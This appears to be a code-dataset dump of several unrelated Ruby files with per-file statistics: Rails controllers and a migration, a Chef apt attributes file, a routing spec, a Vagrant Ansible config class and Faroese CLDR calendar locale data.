hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
91cdd4fc4375acff754c3c15b07a8e9c07942c1d | 97 | # frozen_string_literal: true
class UsersController < ApplicationController
def show; end
end
| 16.166667 | 45 | 0.814433 |
1d7e289d698122bf04cc04d3e3819b77fa8805b3 | 633 | class Admins::ConfirmationsController < Devise::ConfirmationsController
# GET /resource/confirmation/new
# def new
# super
# end
# POST /resource/confirmation
# def create
# super
# end
# GET /resource/confirmation?confirmation_token=abcdef
# def show
# super
# end
# protected
# The path used after resending confirmation instructions.
# def after_resending_confirmation_instructions_path_for(resource_name)
# super(resource_name)
# end
# The path used after confirmation.
# def after_confirmation_path_for(resource_name, resource)
# super(resource_name, resource)
# end
end
| 21.827586 | 73 | 0.729858 |
21364dbc111368f5e675cec68c30067238ffb597 | 1,477 | # vim: syntax=ruby:expandtab:shiftwidth=2:softtabstop=2:tabstop=2
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
if node.debian?
mirror = 'http://httpredir.debian.org/debian'
security_mirror = 'http://security.debian.org/'
elsif node.ubuntu?
mirror = 'http://archive.ubuntu.com/ubuntu'
security_mirror = 'http://security.ubuntu.com/ubuntu'
end
default['fb_apt'] = {
'config' => {},
'repos' => [],
'keyserver' => 'keys.gnupg.net',
'mirror' => mirror,
'security_mirror' => security_mirror,
'preferences' => {},
'preserve_sources_list_d' => false,
'update_delay' => 86400,
'want_backports' => false,
'want_non_free' => false,
'want_source' => false,
'preserve_unknown_keyrings' => false,
'allow_modified_pkg_keyrings' => false,
}
# fb_apt must be defined for this to work...
keys = FB::Apt.get_official_keyids(node).map { |id| [id, nil] }.to_h
default['fb_apt']['keys'] = keys
| 32.822222 | 74 | 0.710223 |
112432a29ab96e23f2c0e131746ceaa0b411f4b5 | 94 | # frozen_string_literal: true
module Engine
module Game
module G1848
end
end
end
| 10.444444 | 29 | 0.712766 |
3992b76a87acf92b0423f59dd27d54e7f72fa8e6 | 1,426 | # -*- encoding : utf-8 -*-
#coding: utf-8
#coding: utf-8
require "spec_helper"
describe DistributionListsController do
describe "routing" do
it "recognizes and generates #index" do
{ :get => "/distribution_lists" }.should route_to(:controller => "distribution_lists", :action => "index")
end
it "recognizes and generates #new" do
{ :get => "/distribution_lists/new" }.should route_to(:controller => "distribution_lists", :action => "new")
end
it "recognizes and generates #show" do
{ :get => "/distribution_lists/1" }.should route_to(:controller => "distribution_lists", :action => "show", :id => "1")
end
it "recognizes and generates #edit" do
{ :get => "/distribution_lists/1/edit" }.should route_to(:controller => "distribution_lists", :action => "edit", :id => "1")
end
it "recognizes and generates #create" do
{ :post => "/distribution_lists" }.should route_to(:controller => "distribution_lists", :action => "create")
end
it "recognizes and generates #update" do
{ :put => "/distribution_lists/1" }.should route_to(:controller => "distribution_lists", :action => "update", :id => "1")
end
it "recognizes and generates #destroy" do
{ :delete => "/distribution_lists/1" }.should route_to(:controller => "distribution_lists", :action => "destroy", :id => "1")
end
end
end
| 35.65 | 132 | 0.626227 |
79ddcce30032161895e556460631ac2644ad2d15 | 4,426 | module VagrantPlugins
module Ansible
class Config < Vagrant.plugin("2", :config)
attr_accessor :playbook
attr_accessor :extra_vars
attr_accessor :inventory_path
attr_accessor :ask_sudo_pass
attr_accessor :limit
attr_accessor :sudo
attr_accessor :sudo_user
attr_accessor :verbose
attr_accessor :tags
attr_accessor :skip_tags
attr_accessor :start_at_task
attr_accessor :groups
attr_accessor :host_key_checking
# Joker attribute, used to pass unsupported arguments to ansible-playbook anyway
attr_accessor :raw_arguments
# Joker attribute, used to set additional SSH parameters for ansible-playbook anyway
attr_accessor :raw_ssh_args
def initialize
@playbook = UNSET_VALUE
@extra_vars = UNSET_VALUE
@inventory_path = UNSET_VALUE
@ask_sudo_pass = UNSET_VALUE
@limit = UNSET_VALUE
@sudo = UNSET_VALUE
@sudo_user = UNSET_VALUE
@verbose = UNSET_VALUE
@tags = UNSET_VALUE
@skip_tags = UNSET_VALUE
@start_at_task = UNSET_VALUE
@groups = UNSET_VALUE
@host_key_checking = UNSET_VALUE
@raw_arguments = UNSET_VALUE
@raw_ssh_args = UNSET_VALUE
end
def finalize!
@playbook = nil if @playbook == UNSET_VALUE
@extra_vars = nil if @extra_vars == UNSET_VALUE
@inventory_path = nil if @inventory_path == UNSET_VALUE
@ask_sudo_pass = false unless @ask_sudo_pass == true
@limit = nil if @limit == UNSET_VALUE
@sudo = false unless @sudo == true
@sudo_user = nil if @sudo_user == UNSET_VALUE
@verbose = nil if @verbose == UNSET_VALUE
@tags = nil if @tags == UNSET_VALUE
@skip_tags = nil if @skip_tags == UNSET_VALUE
@start_at_task = nil if @start_at_task == UNSET_VALUE
@groups = {} if @groups == UNSET_VALUE
@host_key_checking = false unless @host_key_checking == true
@raw_arguments = nil if @raw_arguments == UNSET_VALUE
@raw_ssh_args = nil if @raw_ssh_args == UNSET_VALUE
end
def validate(machine)
errors = _detected_errors
# Validate that a playbook path was provided
if !playbook
errors << I18n.t("vagrant.provisioners.ansible.no_playbook")
end
# Validate the existence of said playbook on the host
if playbook
expanded_path = Pathname.new(playbook).expand_path(machine.env.root_path)
if !expanded_path.file?
errors << I18n.t("vagrant.provisioners.ansible.playbook_path_invalid",
:path => expanded_path)
end
end
# Validate that extra_vars is either a hash, or a path to an
# existing file
if extra_vars
extra_vars_is_valid = extra_vars.kind_of?(Hash) || extra_vars.kind_of?(String)
if extra_vars.kind_of?(String)
# Accept the usage of '@' prefix in Vagrantfile (e.g. '@vars.yml'
# and 'vars.yml' are both supported)
match_data = /^@?(.+)$/.match(extra_vars)
extra_vars_path = match_data[1].to_s
expanded_path = Pathname.new(extra_vars_path).expand_path(machine.env.root_path)
extra_vars_is_valid = expanded_path.exist?
if extra_vars_is_valid
@extra_vars = '@' + extra_vars_path
end
end
if !extra_vars_is_valid
errors << I18n.t("vagrant.provisioners.ansible.extra_vars_invalid",
:type => extra_vars.class.to_s,
:value => extra_vars.to_s
)
end
end
# Validate the existence of the inventory_path, if specified
if inventory_path
expanded_path = Pathname.new(inventory_path).expand_path(machine.env.root_path)
if !expanded_path.exist?
errors << I18n.t("vagrant.provisioners.ansible.inventory_path_invalid",
:path => expanded_path)
end
end
{ "ansible provisioner" => errors }
end
end
end
end
| 38.824561 | 92 | 0.585178 |
7a91885464e58e8ec66bea3363625a6e55684cf5 | 207 | class AddObjectTypeToSpaceEvents < ActiveRecord::Migration
def change
add_column :space_events, :object_type, :integer, null: false
add_column :space_events, :role, :integer, null: false
end
end
| 29.571429 | 65 | 0.763285 |
62a5eedc9bcf74e419d16273626d470ef6b5412f | 23,974 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/fo.xml
# Original file revision: 1.26 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@localized_pattern_characters = "GyMdkHmsSEDFwWahKzYeugAZ"
@default = "gregorian"
@months = {}
@months[:gregorian] = {}
@months[:gregorian][:abbreviated] = {}
@months[:gregorian][:abbreviated]["1"] = "jan"
@months[:gregorian][:abbreviated]["10"] = "okt"
@months[:gregorian][:abbreviated]["11"] = "nov"
@months[:gregorian][:abbreviated]["12"] = "des"
@months[:gregorian][:abbreviated]["2"] = "feb"
@months[:gregorian][:abbreviated]["3"] = "mar"
@months[:gregorian][:abbreviated]["4"] = "apr"
@months[:gregorian][:abbreviated]["5"] = "mai"
@months[:gregorian][:abbreviated]["6"] = "jun"
@months[:gregorian][:abbreviated]["7"] = "jul"
@months[:gregorian][:abbreviated]["8"] = "aug"
@months[:gregorian][:abbreviated]["9"] = "sep"
@months[:gregorian][:narrow] = {}
@months[:gregorian][:narrow]["1"] = "1"
@months[:gregorian][:narrow]["10"] = "10"
@months[:gregorian][:narrow]["11"] = "11"
@months[:gregorian][:narrow]["12"] = "12"
@months[:gregorian][:narrow]["2"] = "2"
@months[:gregorian][:narrow]["3"] = "3"
@months[:gregorian][:narrow]["4"] = "4"
@months[:gregorian][:narrow]["5"] = "5"
@months[:gregorian][:narrow]["6"] = "6"
@months[:gregorian][:narrow]["7"] = "7"
@months[:gregorian][:narrow]["8"] = "8"
@months[:gregorian][:narrow]["9"] = "9"
@months[:gregorian][:wide] = {}
@months[:gregorian][:wide]["1"] = "januar"
@months[:gregorian][:wide]["10"] = "oktober"
@months[:gregorian][:wide]["11"] = "november"
@months[:gregorian][:wide]["12"] = "desember"
@months[:gregorian][:wide]["2"] = "februar"
@months[:gregorian][:wide]["3"] = "mars"
@months[:gregorian][:wide]["4"] = "apríl"
@months[:gregorian][:wide]["5"] = "mai"
@months[:gregorian][:wide]["6"] = "juni"
@months[:gregorian][:wide]["7"] = "juli"
@months[:gregorian][:wide]["8"] = "august"
@months[:gregorian][:wide]["9"] = "september"
@months[:hebrew] = {}
@months[:hebrew][:abbreviated] = {}
@months[:hebrew][:abbreviated]["1"] = "Tishri"
@months[:hebrew][:abbreviated]["10"] = "Sivan"
@months[:hebrew][:abbreviated]["11"] = "Tamuz"
@months[:hebrew][:abbreviated]["12"] = "Av"
@months[:hebrew][:abbreviated]["13"] = "Elul"
@months[:hebrew][:abbreviated]["2"] = "Heshvan"
@months[:hebrew][:abbreviated]["3"] = "Kislev"
@months[:hebrew][:abbreviated]["4"] = "Tevet"
@months[:hebrew][:abbreviated]["5"] = "Shevat"
@months[:hebrew][:abbreviated]["6"] = "Adar I"
@months[:hebrew][:abbreviated]["7"] = "Adar"
@months[:hebrew][:abbreviated]["8"] = "Nisan"
@months[:hebrew][:abbreviated]["9"] = "Iyar"
@months[:hebrew][:wide] = {}
@months[:hebrew][:wide]["1"] = "Tishri"
@months[:hebrew][:wide]["10"] = "Sivan"
@months[:hebrew][:wide]["11"] = "Tamuz"
@months[:hebrew][:wide]["12"] = "Av"
@months[:hebrew][:wide]["13"] = "Elul"
@months[:hebrew][:wide]["2"] = "Heshvan"
@months[:hebrew][:wide]["3"] = "Kislev"
@months[:hebrew][:wide]["4"] = "Tevet"
@months[:hebrew][:wide]["5"] = "Shevat"
@months[:hebrew][:wide]["6"] = "Adar I"
@months[:hebrew][:wide]["7"] = "Adar"
@months[:hebrew][:wide]["8"] = "Nisan"
@months[:hebrew][:wide]["9"] = "Iyar"
@months[:islamic_civil] = {}
@months[:islamic_civil][:abbreviated] = {}
@months[:islamic_civil][:abbreviated]["1"] = "Muharram"
@months[:islamic_civil][:abbreviated]["10"] = "Shawwal"
@months[:islamic_civil][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:abbreviated]["2"] = "Safar"
@months[:islamic_civil][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic_civil][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic_civil][:abbreviated]["5"] = "Jumada I"
@months[:islamic_civil][:abbreviated]["6"] = "Jumada II"
@months[:islamic_civil][:abbreviated]["7"] = "Rajab"
@months[:islamic_civil][:abbreviated]["8"] = "Shaʻban"
@months[:islamic_civil][:abbreviated]["9"] = "Ramadan"
@months[:islamic_civil][:wide] = {}
@months[:islamic_civil][:wide]["1"] = "Muharram"
@months[:islamic_civil][:wide]["10"] = "Shawwal"
@months[:islamic_civil][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:wide]["2"] = "Safar"
@months[:islamic_civil][:wide]["3"] = "Rabiʻ I"
@months[:islamic_civil][:wide]["4"] = "Rabiʻ II"
@months[:islamic_civil][:wide]["5"] = "Jumada I"
@months[:islamic_civil][:wide]["6"] = "Jumada II"
@months[:islamic_civil][:wide]["7"] = "Rajab"
@months[:islamic_civil][:wide]["8"] = "Shaʻban"
@months[:islamic_civil][:wide]["9"] = "Ramadan"
@months[:islamic] = {}
@months[:islamic][:abbreviated] = {}
@months[:islamic][:abbreviated]["1"] = "Muharram"
@months[:islamic][:abbreviated]["10"] = "Shawwal"
@months[:islamic][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:abbreviated]["2"] = "Safar"
@months[:islamic][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic][:abbreviated]["5"] = "Jumada I"
@months[:islamic][:abbreviated]["6"] = "Jumada II"
@months[:islamic][:abbreviated]["7"] = "Rajab"
@months[:islamic][:abbreviated]["8"] = "Shaʻban"
@months[:islamic][:abbreviated]["9"] = "Ramadan"
@months[:islamic][:wide] = {}
@months[:islamic][:wide]["1"] = "Muharram"
@months[:islamic][:wide]["10"] = "Shawwal"
@months[:islamic][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:wide]["2"] = "Safar"
@months[:islamic][:wide]["3"] = "Rabiʻ I"
@months[:islamic][:wide]["4"] = "Rabiʻ II"
@months[:islamic][:wide]["5"] = "Jumada I"
@months[:islamic][:wide]["6"] = "Jumada II"
@months[:islamic][:wide]["7"] = "Rajab"
@months[:islamic][:wide]["8"] = "Shaʻban"
@months[:islamic][:wide]["9"] = "Ramadan"
@months[:persian] = {}
@months[:persian][:abbreviated] = {}
@months[:persian][:abbreviated]["1"] = "Farvardin"
@months[:persian][:abbreviated]["10"] = "Dey"
@months[:persian][:abbreviated]["11"] = "Bahman"
@months[:persian][:abbreviated]["12"] = "Esfand"
@months[:persian][:abbreviated]["2"] = "Ordibehesht"
@months[:persian][:abbreviated]["3"] = "Khordad"
@months[:persian][:abbreviated]["4"] = "Tir"
@months[:persian][:abbreviated]["5"] = "Mordad"
@months[:persian][:abbreviated]["6"] = "Shahrivar"
@months[:persian][:abbreviated]["7"] = "Mehr"
@months[:persian][:abbreviated]["8"] = "Aban"
@months[:persian][:abbreviated]["9"] = "Azar"
@months[:persian][:wide] = {}
@months[:persian][:wide]["1"] = "Farvardin"
@months[:persian][:wide]["10"] = "Dey"
@months[:persian][:wide]["11"] = "Bahman"
@months[:persian][:wide]["12"] = "Esfand"
@months[:persian][:wide]["2"] = "Ordibehesht"
@months[:persian][:wide]["3"] = "Khordad"
@months[:persian][:wide]["4"] = "Tir"
@months[:persian][:wide]["5"] = "Mordad"
@months[:persian][:wide]["6"] = "Shahrivar"
@months[:persian][:wide]["7"] = "Mehr"
@months[:persian][:wide]["8"] = "Aban"
@months[:persian][:wide]["9"] = "Azar"
@monthformat_defaults = {}
@monthformat_defaults["gregorian"] = "wide"
@monthformat_defaults["hebrew"] = "wide"
@monthformat_defaults["islamic"] = "wide"
@monthformat_defaults["islamic-civil"] = "wide"
@monthformat_defaults["persian"] = "wide"
@days = {}
@days[:gregorian] = {}
@days[:gregorian][:abbreviated] = {}
@days[:gregorian][:abbreviated]["fri"] = "frí"
@days[:gregorian][:abbreviated]["mon"] = "mán"
@days[:gregorian][:abbreviated]["sat"] = "ley"
@days[:gregorian][:abbreviated]["sun"] = "sun"
@days[:gregorian][:abbreviated]["thu"] = "hós"
@days[:gregorian][:abbreviated]["tue"] = "týs"
@days[:gregorian][:abbreviated]["wed"] = "mik"
@days[:gregorian][:narrow] = {}
@days[:gregorian][:narrow]["fri"] = "6"
@days[:gregorian][:narrow]["mon"] = "2"
@days[:gregorian][:narrow]["sat"] = "7"
@days[:gregorian][:narrow]["sun"] = "1"
@days[:gregorian][:narrow]["thu"] = "5"
@days[:gregorian][:narrow]["tue"] = "3"
@days[:gregorian][:narrow]["wed"] = "4"
@days[:gregorian][:wide] = {}
@days[:gregorian][:wide]["fri"] = "fríggjadagur"
@days[:gregorian][:wide]["mon"] = "mánadagur"
@days[:gregorian][:wide]["sat"] = "leygardagur"
@days[:gregorian][:wide]["sun"] = "sunnudagur"
@days[:gregorian][:wide]["thu"] = "hósdagur"
@days[:gregorian][:wide]["tue"] = "týsdagur"
@days[:gregorian][:wide]["wed"] = "mikudagur"
@dayformat_defaults = {}
@dayformat_defaults["gregorian"] = "wide"
@week_firstdays = {}
@week_firstdays["gregorian"] = "sun"
@weekend_starts = {}
@weekend_starts["gregorian"] = "sat"
@weekend_ends = {}
@weekend_ends["gregorian"] = "sun"
@mindays = {}
@mindays["gregorian"] = "1"
@am = {}
@am["gregorian"] = "AM"
@pm = {}
@pm["gregorian"] = "PM"
@era_names = {}
@era_abbrs = {}
@era_abbrs[:buddhist] = {}
@era_abbrs[:buddhist]["0"] = "BE"
@era_abbrs[:gregorian] = {}
@era_abbrs[:gregorian]["0"] = "BCE"
@era_abbrs[:gregorian]["1"] = "CE"
@era_abbrs[:hebrew] = {}
@era_abbrs[:hebrew]["0"] = "AM"
@era_abbrs[:islamic_civil] = {}
@era_abbrs[:islamic_civil]["0"] = "AH"
@era_abbrs[:islamic] = {}
@era_abbrs[:islamic]["0"] = "AH"
@era_abbrs[:japanese] = {}
@era_abbrs[:japanese]["0"] = "Taika"
@era_abbrs[:japanese]["1"] = "Hakuchi"
@era_abbrs[:japanese]["10"] = "Tempyō"
@era_abbrs[:japanese]["100"] = "Kaō"
@era_abbrs[:japanese]["101"] = "Shōan"
@era_abbrs[:japanese]["102"] = "Angen"
@era_abbrs[:japanese]["103"] = "Jishō"
@era_abbrs[:japanese]["104"] = "Yōwa"
@era_abbrs[:japanese]["105"] = "Juei"
@era_abbrs[:japanese]["106"] = "Genryuku"
@era_abbrs[:japanese]["107"] = "Bunji"
@era_abbrs[:japanese]["108"] = "Kenkyū"
@era_abbrs[:japanese]["109"] = "Shōji"
@era_abbrs[:japanese]["11"] = "Tempyō-kampō"
@era_abbrs[:japanese]["110"] = "Kennin"
@era_abbrs[:japanese]["111"] = "Genkyū"
@era_abbrs[:japanese]["112"] = "Ken-ei"
@era_abbrs[:japanese]["113"] = "Shōgen"
@era_abbrs[:japanese]["114"] = "Kenryaku"
@era_abbrs[:japanese]["115"] = "Kenpō"
@era_abbrs[:japanese]["116"] = "Shōkyū"
@era_abbrs[:japanese]["117"] = "Jōō"
@era_abbrs[:japanese]["118"] = "Gennin"
@era_abbrs[:japanese]["119"] = "Karoku"
@era_abbrs[:japanese]["12"] = "Tempyō-shōhō"
@era_abbrs[:japanese]["120"] = "Antei"
@era_abbrs[:japanese]["121"] = "Kanki"
@era_abbrs[:japanese]["122"] = "Jōei"
@era_abbrs[:japanese]["123"] = "Tempuku"
@era_abbrs[:japanese]["124"] = "Bunryaku"
@era_abbrs[:japanese]["125"] = "Katei"
@era_abbrs[:japanese]["126"] = "Ryakunin"
@era_abbrs[:japanese]["127"] = "En-ō"
@era_abbrs[:japanese]["128"] = "Ninji"
@era_abbrs[:japanese]["129"] = "Kangen"
@era_abbrs[:japanese]["13"] = "Tempyō-hōji"
@era_abbrs[:japanese]["130"] = "Hōji"
@era_abbrs[:japanese]["131"] = "Kenchō"
@era_abbrs[:japanese]["132"] = "Kōgen"
@era_abbrs[:japanese]["133"] = "Shōka"
@era_abbrs[:japanese]["134"] = "Shōgen"
@era_abbrs[:japanese]["135"] = "Bun-ō"
@era_abbrs[:japanese]["136"] = "Kōchō"
@era_abbrs[:japanese]["137"] = "Bun-ei"
@era_abbrs[:japanese]["138"] = "Kenji"
@era_abbrs[:japanese]["139"] = "Kōan"
@era_abbrs[:japanese]["14"] = "Temphō-jingo"
@era_abbrs[:japanese]["140"] = "Shōō"
@era_abbrs[:japanese]["141"] = "Einin"
@era_abbrs[:japanese]["142"] = "Shōan"
@era_abbrs[:japanese]["143"] = "Kengen"
@era_abbrs[:japanese]["144"] = "Kagen"
@era_abbrs[:japanese]["145"] = "Tokuji"
@era_abbrs[:japanese]["146"] = "Enkei"
@era_abbrs[:japanese]["147"] = "Ōchō"
@era_abbrs[:japanese]["148"] = "Shōwa"
@era_abbrs[:japanese]["149"] = "Bunpō"
@era_abbrs[:japanese]["15"] = "Jingo-keiun"
@era_abbrs[:japanese]["150"] = "Genō"
@era_abbrs[:japanese]["151"] = "Genkyō"
@era_abbrs[:japanese]["152"] = "Shōchū"
@era_abbrs[:japanese]["153"] = "Kareki"
@era_abbrs[:japanese]["154"] = "Gentoku"
@era_abbrs[:japanese]["155"] = "Genkō"
@era_abbrs[:japanese]["156"] = "Kemmu"
@era_abbrs[:japanese]["157"] = "Engen"
@era_abbrs[:japanese]["158"] = "Kōkoku"
@era_abbrs[:japanese]["159"] = "Shōhei"
@era_abbrs[:japanese]["16"] = "Hōki"
@era_abbrs[:japanese]["160"] = "Kentoku"
@era_abbrs[:japanese]["161"] = "Bunchũ"
@era_abbrs[:japanese]["162"] = "Tenju"
@era_abbrs[:japanese]["163"] = "Kōryaku"
@era_abbrs[:japanese]["164"] = "Kōwa"
@era_abbrs[:japanese]["165"] = "Genchũ"
@era_abbrs[:japanese]["166"] = "Meitoku"
@era_abbrs[:japanese]["167"] = "Kakei"
@era_abbrs[:japanese]["168"] = "Kōō"
@era_abbrs[:japanese]["169"] = "Meitoku"
@era_abbrs[:japanese]["17"] = "Ten-ō"
@era_abbrs[:japanese]["170"] = "Ōei"
@era_abbrs[:japanese]["171"] = "Shōchō"
@era_abbrs[:japanese]["172"] = "Eikyō"
@era_abbrs[:japanese]["173"] = "Kakitsu"
@era_abbrs[:japanese]["174"] = "Bun-an"
@era_abbrs[:japanese]["175"] = "Hōtoku"
@era_abbrs[:japanese]["176"] = "Kyōtoku"
@era_abbrs[:japanese]["177"] = "Kōshō"
@era_abbrs[:japanese]["178"] = "Chōroku"
@era_abbrs[:japanese]["179"] = "Kanshō"
@era_abbrs[:japanese]["18"] = "Enryaku"
@era_abbrs[:japanese]["180"] = "Bunshō"
@era_abbrs[:japanese]["181"] = "Ōnin"
@era_abbrs[:japanese]["182"] = "Bunmei"
@era_abbrs[:japanese]["183"] = "Chōkyō"
@era_abbrs[:japanese]["184"] = "Entoku"
@era_abbrs[:japanese]["185"] = "Meiō"
@era_abbrs[:japanese]["186"] = "Bunki"
@era_abbrs[:japanese]["187"] = "Eishō"
@era_abbrs[:japanese]["188"] = "Taiei"
@era_abbrs[:japanese]["189"] = "Kyōroku"
@era_abbrs[:japanese]["19"] = "Daidō"
@era_abbrs[:japanese]["190"] = "Tenmon"
@era_abbrs[:japanese]["191"] = "Kōji"
@era_abbrs[:japanese]["192"] = "Eiroku"
@era_abbrs[:japanese]["193"] = "Genki"
@era_abbrs[:japanese]["194"] = "Tenshō"
@era_abbrs[:japanese]["195"] = "Bunroku"
@era_abbrs[:japanese]["196"] = "Keichō"
@era_abbrs[:japanese]["197"] = "Genwa"
@era_abbrs[:japanese]["198"] = "Kan-ei"
@era_abbrs[:japanese]["199"] = "Shōho"
@era_abbrs[:japanese]["2"] = "Hakuhō"
@era_abbrs[:japanese]["20"] = "Kōnin"
@era_abbrs[:japanese]["200"] = "Keian"
@era_abbrs[:japanese]["201"] = "Shōō"
@era_abbrs[:japanese]["202"] = "Meiryaku"
@era_abbrs[:japanese]["203"] = "Manji"
@era_abbrs[:japanese]["204"] = "Kanbun"
@era_abbrs[:japanese]["205"] = "Enpō"
@era_abbrs[:japanese]["206"] = "Tenwa"
@era_abbrs[:japanese]["207"] = "Jōkyō"
@era_abbrs[:japanese]["208"] = "Genroku"
@era_abbrs[:japanese]["209"] = "Hōei"
@era_abbrs[:japanese]["21"] = "Tenchō"
@era_abbrs[:japanese]["210"] = "Shōtoku"
@era_abbrs[:japanese]["211"] = "Kyōhō"
@era_abbrs[:japanese]["212"] = "Genbun"
@era_abbrs[:japanese]["213"] = "Kanpō"
@era_abbrs[:japanese]["214"] = "Enkyō"
@era_abbrs[:japanese]["215"] = "Kan-en"
@era_abbrs[:japanese]["216"] = "Hōryaku"
@era_abbrs[:japanese]["217"] = "Meiwa"
@era_abbrs[:japanese]["218"] = "An-ei"
@era_abbrs[:japanese]["219"] = "Tenmei"
@era_abbrs[:japanese]["22"] = "Shōwa"
@era_abbrs[:japanese]["220"] = "Kansei"
@era_abbrs[:japanese]["221"] = "Kyōwa"
@era_abbrs[:japanese]["222"] = "Bunka"
@era_abbrs[:japanese]["223"] = "Bunsei"
@era_abbrs[:japanese]["224"] = "Tenpō"
@era_abbrs[:japanese]["225"] = "Kōka"
@era_abbrs[:japanese]["226"] = "Kaei"
@era_abbrs[:japanese]["227"] = "Ansei"
@era_abbrs[:japanese]["228"] = "Man-en"
@era_abbrs[:japanese]["229"] = "Bunkyū"
@era_abbrs[:japanese]["23"] = "Kajō"
@era_abbrs[:japanese]["230"] = "Genji"
@era_abbrs[:japanese]["231"] = "Keiō"
@era_abbrs[:japanese]["232"] = "Meiji"
@era_abbrs[:japanese]["233"] = "Taishō"
@era_abbrs[:japanese]["234"] = "Shōwa"
@era_abbrs[:japanese]["235"] = "Heisei"
@era_abbrs[:japanese]["24"] = "Ninju"
@era_abbrs[:japanese]["25"] = "Saiko"
@era_abbrs[:japanese]["26"] = "Tennan"
@era_abbrs[:japanese]["27"] = "Jōgan"
@era_abbrs[:japanese]["28"] = "Genkei"
@era_abbrs[:japanese]["29"] = "Ninna"
@era_abbrs[:japanese]["3"] = "Shuchō"
@era_abbrs[:japanese]["30"] = "Kampyō"
@era_abbrs[:japanese]["31"] = "Shōtai"
@era_abbrs[:japanese]["32"] = "Engi"
@era_abbrs[:japanese]["33"] = "Enchō"
@era_abbrs[:japanese]["34"] = "Shōhei"
@era_abbrs[:japanese]["35"] = "Tengyō"
@era_abbrs[:japanese]["36"] = "Tenryaku"
@era_abbrs[:japanese]["37"] = "Tentoku"
@era_abbrs[:japanese]["38"] = "Ōwa"
@era_abbrs[:japanese]["39"] = "Kōhō"
@era_abbrs[:japanese]["4"] = "Taihō"
@era_abbrs[:japanese]["40"] = "Anna"
@era_abbrs[:japanese]["41"] = "Tenroku"
@era_abbrs[:japanese]["42"] = "Ten-en"
@era_abbrs[:japanese]["43"] = "Jōgen"
@era_abbrs[:japanese]["44"] = "Tengen"
@era_abbrs[:japanese]["45"] = "Eikan"
@era_abbrs[:japanese]["46"] = "Kanna"
@era_abbrs[:japanese]["47"] = "Ei-en"
@era_abbrs[:japanese]["48"] = "Eiso"
@era_abbrs[:japanese]["49"] = "Shōryaku"
@era_abbrs[:japanese]["5"] = "Keiun"
@era_abbrs[:japanese]["50"] = "Chōtoku"
@era_abbrs[:japanese]["51"] = "Chōhō"
@era_abbrs[:japanese]["52"] = "Kankō"
@era_abbrs[:japanese]["53"] = "Chōwa"
@era_abbrs[:japanese]["54"] = "Kannin"
@era_abbrs[:japanese]["55"] = "Jian"
@era_abbrs[:japanese]["56"] = "Manju"
@era_abbrs[:japanese]["57"] = "Chōgen"
@era_abbrs[:japanese]["58"] = "Chōryaku"
@era_abbrs[:japanese]["59"] = "Chōkyū"
@era_abbrs[:japanese]["6"] = "Wadō"
@era_abbrs[:japanese]["60"] = "Kantoku"
@era_abbrs[:japanese]["61"] = "Eishō"
@era_abbrs[:japanese]["62"] = "Tengi"
@era_abbrs[:japanese]["63"] = "Kōhei"
@era_abbrs[:japanese]["64"] = "Jiryaku"
@era_abbrs[:japanese]["65"] = "Enkyū"
@era_abbrs[:japanese]["66"] = "Shōho"
@era_abbrs[:japanese]["67"] = "Shōryaku"
@era_abbrs[:japanese]["68"] = "Eiho"
@era_abbrs[:japanese]["69"] = "Ōtoku"
@era_abbrs[:japanese]["7"] = "Reiki"
@era_abbrs[:japanese]["70"] = "Kanji"
@era_abbrs[:japanese]["71"] = "Kaho"
@era_abbrs[:japanese]["72"] = "Eichō"
@era_abbrs[:japanese]["73"] = "Shōtoku"
@era_abbrs[:japanese]["74"] = "Kōwa"
@era_abbrs[:japanese]["75"] = "Chōji"
@era_abbrs[:japanese]["76"] = "Kashō"
@era_abbrs[:japanese]["77"] = "Tennin"
@era_abbrs[:japanese]["78"] = "Ten-ei"
@era_abbrs[:japanese]["79"] = "Eikyū"
@era_abbrs[:japanese]["8"] = "Yōrō"
@era_abbrs[:japanese]["80"] = "Gen-ei"
@era_abbrs[:japanese]["81"] = "Hoan"
@era_abbrs[:japanese]["82"] = "Tenji"
@era_abbrs[:japanese]["83"] = "Daiji"
@era_abbrs[:japanese]["84"] = "Tenshō"
@era_abbrs[:japanese]["85"] = "Chōshō"
@era_abbrs[:japanese]["86"] = "Hoen"
@era_abbrs[:japanese]["87"] = "Eiji"
@era_abbrs[:japanese]["88"] = "Kōji"
@era_abbrs[:japanese]["89"] = "Tenyō"
@era_abbrs[:japanese]["9"] = "Jinki"
@era_abbrs[:japanese]["90"] = "Kyūan"
@era_abbrs[:japanese]["91"] = "Ninpei"
@era_abbrs[:japanese]["92"] = "Kyūju"
@era_abbrs[:japanese]["93"] = "Hogen"
@era_abbrs[:japanese]["94"] = "Heiji"
@era_abbrs[:japanese]["95"] = "Eiryaku"
@era_abbrs[:japanese]["96"] = "Ōho"
@era_abbrs[:japanese]["97"] = "Chōkan"
@era_abbrs[:japanese]["98"] = "Eiman"
@era_abbrs[:japanese]["99"] = "Nin-an"
@era_abbrs[:persian] = {}
@era_abbrs[:persian]["0"] = "AP"
@dateformats = {}
@dateformats[:buddhist] = {}
